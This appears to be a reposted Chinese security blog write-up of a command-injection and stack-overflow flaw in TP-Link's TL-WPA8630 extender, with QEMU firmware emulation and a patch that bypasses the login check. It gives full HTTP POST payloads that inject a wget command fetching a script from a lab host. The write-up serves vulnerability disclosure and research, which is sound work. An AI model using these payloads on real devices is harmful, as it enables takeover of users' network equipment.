51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

TPLink 中继器设备命令注入漏洞分析及复现

写在前面:

在分析TPlink中继器设备时(这里以TL-WPA8630为代表),发现了两处可以利用的命令注入和栈溢出漏洞,因此借这个机会,将TPlink此类设备的模拟方法也进行了研究,并在本地对漏洞进行了复现。相关漏洞已经提交至CVE官网。

漏洞介绍:
在httpd文件处理admin/powerline的sub_40A918函数中,存在两处命令注入漏洞(也可以构造栈溢出)。对plc_device对应的key参数、plc_add对应的devicePwd参数不加过滤,直接vsprintf拼接执行,造成命令注入,也可以实现栈溢出攻击。
版本:TL-WPA8630 KIT(US)_V2_171011版,以及其他WPA、WR、WA等电力猫与中继器设备对应版本。

漏洞静态分析
httpd文件调用sub_40A918处理/admin/powerline的对应请求:

sub_40A918首先判断form参数,如果form参数是plc_device,则交给sub_40A774函数处理,如果form参数是plc_add,则交给sub_40A80C函数处理,这两个函数都有漏洞,我们依次分析。

sub_40A774函数如下,获取operation参数,如果参数是remove,则获取后续key参数,然后将key交给sub_4036A0函数处理,后续会将key的参数直接用vsprintf凭借,然后执行,既可以实现命令注入,又可以实现栈溢出。

sub_40A80C函数如下,获取operation参数,如果参数是write,则获取后续devicePwd参数,然后将其交给sub_4036A0函数处理,同上述一样,既可以实现命令注入,又可以实现栈溢出。

固件模拟
基本步骤和往常的设备模拟一样,利用qemu进行系统模拟,命令如下:

                    #qemu系统模式启动
                  
                  

                  sudo qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append 
                  
                    "root=/dev/sda1 console=tty0"
                  
                   -net nic -net tap -nographic
                  

                  
                    #主机网卡配置
                  
                  

                  
                    #! /bin/sh 
                  
                  

                  sudo sysctl -w net.ipv4.ip_forward=1 
                  

                  sudo iptables -F 
                  

                  sudo iptables -X 
                  

                  sudo iptables -t nat -F 
                  

                  sudo iptables -t nat -X 
                  

                  sudo iptables -t mangle -F 
                  

                  sudo iptables -t mangle -X 
                  

                  sudo iptables -P INPUT ACCEPT 
                  

                  sudo iptables -P FORWARD ACCEPT 
                  

                  sudo iptables -P OUTPUT ACCEPT 
                  

                  sudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE 
                  

                  sudo iptables -I FORWARD 1 -i tap0 -j ACCEPT 
                  

                  sudo iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT 
                  

                  sudo ifconfig tap0 192.168.100.254 netmask 255.255.255.0
                  

                  
                    #qemu网卡配置
                  
                  

                  
                    #!/bin/sh 
                  
                  

                  ifconfig eth0 192.168.100.2 netmask 255.255.255.0 
                  

                  route add default gw 192.168.100.254
                  

                  
                    #文件系统上传
                  
                  

                  scp -r squashfs-root/ root@192.168.100.2:~/
                  

                  
                    #挂载执行:
                  
                  

                  mount -o 
                  
                    bind
                  
                   /dev ./squashfs-root/dev
                  

                  mount -t proc /proc ./squashfs-root/proc
                  

                  chroot squashfs-root sh

在完成基本环境搭建后,下面还是最困难的问题,启动设备的web服务,直接启动httpd文件:

                  ./usr/bin/httpd

发现没有任何报错,然后我们访问对应对应IP:http://192.168.100.2/index.html, 居然直接成功访问登录界面:

心里非常惊喜,以为模拟成功,结果发现并没有。输入TPLink的初始用户名和密码:admin、admin,结果提示,用户名和密码错误。按理来说,此设备的默认密码就是admin,但是发生了错误,说明问题出现在登录时的密码验证环节。我们用burpsuite抓一下登陆时的数据包,发现设备会将输入的用户名和密码写入Cookie的Authorization字段。

我们在IDA里逆向对应的处理流程,程序会先读取Authorization字段,然后在sub_4269B4函数中进行了处理,并进行了分支跳转。盲猜sub_4269B4函数功能就是对登录字段进行校验。

分析sub_4269B4函数,发现该函数确实在进行授权校验,主要原理就是将Authorization字段,同config文件夹下的account.config配置文件中的对应结果进行匹配,匹配失败则返回-1。由于我们直接对解包后的文件系统进行模拟的缘故,config文件夹下并没有相关配置文件,因此登录时会验证失败。

因此,我们要么构造一个符合TPlink结构的config配置文件,要么直接对登录流程进行patch,我们当然选择比较简单的patch方法,只需要将登录的验证跳转分支修改即可。我们将sub_4269B4函数判断改为-1登陆成功,也就是将bltz指令改为bgez指令即可。

将新的httpd文件上传至qemu,此时输入admin、admin,即可成功登入主界面(其实此时应该是任意用户名和密码都可以登入了):

漏洞动态复现
我们分别对两个漏洞点进行复现,在这里我们采用wget命令,验证能否下载文件来证明命令注入成功,在ubuntu中用python搭建简易的web服务器:

                  python3 -m http.server

首先是plc_device对应的漏洞,发送数据包如下:

                  POST /admin/powerline HTTP/1.1
                  

                  Host: 192.168.100.2
                  

                  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
                  

                  Accept: application/json, text/javascript, */*; q=0.01
                  

                  Accept-Language: en-US,en;q=0.5
                  

                  Accept-Encoding: gzip, deflate
                  

                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                  

                  X-Requested-With: XMLHttpRequest
                  

                  Content-Length: 63
                  

                  Origin: http://192.168.100.2
                  

                  Connection: close
                  

                  Referer: http://192.168.100.2/
                  

                  Cookie: Authorization=Basic%20admin%3A21232f297a57a5a743894a0e4a801fc3
                  

                  

                  xxxxxxxxxxxxxxxxxxxxxxxxxx;wget http://192.168.100.254:8000/net.sh; 
                  

                  

                  
                    #不过实际抓包时,发现form参数是跟在POST的URL后面传的,不过两种传参都可以
                  
                  

                  POST /admin/powerline?form=plc_device HTTP/1.1

成功实现对恶意文件net.sh的下载:

其次是plc_add对应的漏洞,发送数据包如下:

                  POST /admin/powerline HTTP/1.1
                  

                  Host: 192.168.100.2
                  

                  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
                  

                  Accept: application/json, text/javascript, */*; q=0.01
                  

                  Accept-Language: en-US,en;q=0.5
                  

                  Accept-Encoding: gzip, deflate
                  

                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                  

                  X-Requested-With: XMLHttpRequest
                  

                  Content-Length: 68
                  

                  Origin: http://192.168.100.2
                  

                  Connection: close
                  

                  Referer: http://192.168.100.2/
                  

                  Cookie: Authorization=Basic%20admin%3A21232f297a57a5a743894a0e4a801fc3
                  

                  

                  xxxxxxxxxxxxxxxxxxxxxxxxxx;wget http://192.168.100.254:8000/net.sh; 
                  

                  

                  
                    #不过实际抓包时,发现form参数是跟在POST的URL后面传的,不过两种传参都可以
                  
                  

                  POST /admin/powerline?form=plc_add HTTP/1.1

成功实现对恶意文件net.sh的下载:


以上为漏洞复现全过程,主要实现了对该品牌此类设备的模拟,并将漏洞进行了实际复现,相关设备具有较多的部署和资产,因此需要用户及时更新设备版本。


本文作者: ChaMd5安全团队

本文为安全脉搏专栏作者发布,转载请注明: https://www.secpulse.com/archives/197163.html

赞(0)
未经允许不得转载:工具盒子 » TPLink 中继器设备命令注入漏洞分析及复现